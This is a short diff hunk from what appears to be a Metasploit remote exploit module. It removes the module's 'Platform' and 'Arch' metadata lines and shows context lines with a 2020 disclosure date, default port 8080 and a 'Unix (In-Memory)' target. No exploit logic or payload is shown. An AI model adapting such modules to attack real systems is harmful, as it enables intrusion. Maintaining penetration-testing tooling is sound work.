@@ -38,8 +38,6 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2020-10-03',
         'DefaultOptions' => { 'RPORT' => 8080 },
-        'Platform' => %w[unix linux macos win],
-        'Arch' => [ARCH_X86, ARCH_X64],
         'Targets' => [
           [
             'Unix (In-Memory)',
